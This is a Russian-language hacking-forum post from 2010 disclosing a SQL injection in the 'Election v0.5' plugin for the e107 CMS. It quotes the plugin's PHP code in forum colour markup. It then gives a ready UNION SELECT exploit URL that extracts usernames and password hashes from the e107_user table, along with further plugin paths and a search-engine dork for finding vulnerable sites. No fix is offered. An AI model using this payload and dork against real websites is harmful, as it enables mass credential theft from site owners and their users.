13.12.2010, 17:59
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Election v0.5
SQL Injection:
/election.php (election_class.php)
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$candidatelist[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$dao[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getCandidateList[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$election[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]());
...
if ([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"user"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"user_id, user_name, user_login"[/COLOR][COLOR="#007700"])) {
while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]()) {
[/COLOR][COLOR="#0000BB"]$owners[/COLOR][COLOR="#007700"][] = array([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"user_id"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"user_name"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" ("[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"user_login"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]")"[/COLOR][COLOR="#007700"]);
}
...[/COLOR][/COLOR]
Пример:
Код:
http://e107/e107_plugins/election/election.php?1.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20e107_user--
Путь:
http://e107/e107_plugins/election/admin_menu.php
http://e107/e107_plugins/election/e_comment.php
http://e107/e107_plugins/election/e_search.php
Дорк:inurl:e107_plugins/election/
|
|
|